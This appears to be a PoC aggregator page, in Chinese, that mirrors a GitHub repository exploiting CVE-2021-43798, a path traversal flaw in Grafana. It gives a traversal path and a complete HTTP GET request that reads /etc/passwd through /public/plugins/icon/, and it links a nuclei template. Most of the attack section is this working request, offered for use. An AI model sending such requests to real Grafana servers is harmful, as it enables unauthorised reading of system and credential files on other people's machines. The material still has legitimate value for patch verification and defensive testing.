POC详情: 704dd91b6e8675f14fd421e6c7c90ad41da9254d

来源
https://github.com/BJLIYANLIANG/CVE-2021-43798-Grafana-File-Read
关联漏洞
标题: Grafana 路径遍历漏洞 (CVE-2021-43798)
描述:Grafana是Grafana实验室的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。 Grafana 8.0.0-beta1至8.3.0存在路径遍历漏洞,攻击者可利用该漏洞执行目录遍历攻击,访问本地文件。
介绍
# Grafana-File-Read

## Grafana未授权文件读取
> 影响版本:8.0.0-lastest

<img width="711" alt="wecom-temp-e380dc0174f4d9f46e9e217a6e2c3ddb" src="https://user-images.githubusercontent.com/45926593/144997417-b4d7aaa1-d58d-4a5f-a22c-e8b9b7f16763.png">

poc:
/public/plugins/icon/../../../../../../../../../../../../../../../../../../etc/passwd

```
GET /public/plugins/icon/../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```

![image](https://user-images.githubusercontent.com/45926593/145003500-72591e78-1919-4662-8e55-6bf30850b59a.png)


nuclei的poc:
[grafana.yaml](https://github.com/tangxiaofeng7/CVE-2021-43798-Grafana-File-Read/blob/main/grafana.yaml)


![image](https://user-images.githubusercontent.com/45926593/145003611-3bb2a517-ecb6-4989-ad22-faf4ceab3128.png)
文件快照

 [4.0K]  /data/pocs/704dd91b6e8675f14fd421e6c7c90ad41da9254d
├── [2.1K]  grafana.yaml
└── [1.1K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。